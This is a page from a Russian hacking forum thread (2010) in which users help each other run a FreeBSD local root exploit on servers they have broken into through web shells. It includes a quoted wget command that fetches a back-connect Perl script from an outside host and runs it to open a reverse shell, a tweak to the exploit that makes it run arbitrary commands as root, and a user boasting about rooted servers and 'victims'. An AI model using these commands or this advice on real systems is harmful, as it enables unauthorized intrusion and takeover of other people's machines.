ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу FreeBSD 7.1, 8 root expl.
   
Ответ
Страница 4 из 4 < 1 2 3 4
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 15.02.2010, 10:23
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095

Репутация: 34
Отправить сообщение для kfor с помощью ICQ
По умолчанию
Ты наврено запускаешь из /tmp а он примантирован как no ex, корчое скопируй в другую папку куда-нить. Правда я неуверен что возьмёт 6.2 но попробуй , отпишись.

З.Ы. Есть вариант что надо сделать chmod 755 на твой скрипт.

GizmoSB, у меня ниразу не получилось скомпилить со скрипта, компиль просто кусками. Из скрипта скопируй куски кода и скомпиль.
Последний раз редактировалось kfor; 15.02.2010 в 12:42..
 
Ответить с цитированием

  #32  
Старый 26.03.2010, 13:15
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
Провел на форуме:
64270

Репутация: 23
Отправить сообщение для overxor с помощью ICQ
По умолчанию
На самом деле бэкконнект не всегда получается делать. В этом случае можно немного поправить сплойт:
system("echo ALEX-ALEX;/bin/sh");
на system("echo ALEX-ALEX;/bin/sh cmd.sh");
после повышения привелегий сплойт будет вполнять команды из cmd.sh под рутом.
Запуск сплойта в вебшеле: w00t.sh &> out.txt. Перенаправление лучше делать потому, что веб шел не выводит stderr поток и мы не увидим ошибок. Результат читаем из out.txt.
 
Ответить с цитированием

  #33  
Старый 26.03.2010, 19:03
wwwall
Новичок
Регистрация: 02.12.2006
Сообщений: 10
Провел на форуме:
115484

Репутация: 0
По умолчанию
Цитата:
Сообщение от BlackSun  
на хосте
wget -O ngix http://fsb-my.name/c/apache-handler
perl ngix your_ip 5995 2> /dev/null &
возможно ли вместо wget использовать $_GET?
т.е. чисто на пхп, не используя консольные команды
возможно ли какнибудь запустить на хосте то что накомпелено в домашних условия, при услонии что не работает с/перл/командная строка
+ нет доступа к папкам до /public_html/
в этой ситуации можно получить рут?
 
Ответить с цитированием

  #34  
Старый 26.03.2010, 19:10
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию
Цитата:
возможно ли вместо wget использовать $_GET?
Возможно ли использовать вместо программы-качалки массив из высокоуровниевого языка?
Возможно ли использовать вместо бензопилы бабушикины спицы, правда они погнулись?
Возможно ли швее-мотористке проектировать ядерные реакторы?

Если включен сеф мод и\или вырублены нужные функции - гугли вначале обход этих ограничений.
 
Ответить с цитированием

  #35  
Старый 02.04.2010, 15:21
rat.energizer
Новичок
Регистрация: 12.03.2010
Сообщений: 9
Провел на форуме:
14624

Репутация: 5
По умолчанию
Цитата:
Сообщение от .:[melkiy]:.  
возможно что-то сделать? хз что делать..

Код:
./qwe.sh
./qwe: Permission denied
6.2-RELEASE-p8 FreeBSD 6.2-RELEASE-p8 #0: Mon Nov 12 17:30:06 EET 2007
Скорее всего noexec флаг.
mount или /etc/fstab глянь и выбери диру другую
 
Ответить с цитированием

  #36  
Старый 02.04.2010, 16:26
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
chmod +x filename
 
Ответить с цитированием

  #37  
Старый 02.04.2010, 19:17
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095

Репутация: 34
Отправить сообщение для kfor с помощью ICQ
По умолчанию
Цитата:
Сообщение от rat.energizer  
Скорее всего noexec флаг.
mount или /etc/fstab глянь и выбери диру другую
6-ку не берёт вроде этот сплойт
 
Ответить с цитированием

  #38  
Старый 05.04.2010, 20:53
mazaxaka
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
Провел на форуме:
883446

Репутация: 82
По умолчанию
кто поможет порутать 8?
 
Ответить с цитированием

  #39  
Старый 12.04.2010, 08:53
zerling
Новичок
Регистрация: 04.01.2008
Сообщений: 21
Провел на форуме:
22522

Репутация: 0
По умолчанию
Цитата:
7.2-RELEASE-p3 FreeBSD 7.2-RELEASE-p3
рутанул сегодня вот такой сервачок )
при срабатывании сплоита в констоль выкинуло вот это
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
До этого много серваков с подходящими версиями не хотели рутаться
Эх жаль я профукал появление этого сплоита в декабре, жертв было бы гораздо больше )
 
Ответить с цитированием

  #40  
Старый 19.04.2010, 21:35
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885

Репутация: 34
По умолчанию
через sh не получилось,кто может помоч по кускам выполнить стукните 600-zero91-642
 
Ответить с цитированием
Ответ
Страница 4 из 4 < 1 2 3 4



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши вопросы по уязвимостям. blackybr Уязвимости 13923 17.06.2010 20:04
Не работает бэк-коннект InFlame *nix 11 20.06.2009 16:10
про socks5 banall *nix 9 11.10.2006 10:17
Помогите откомпилить!! LoFFi Уязвимости 19 19.03.2006 22:56



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ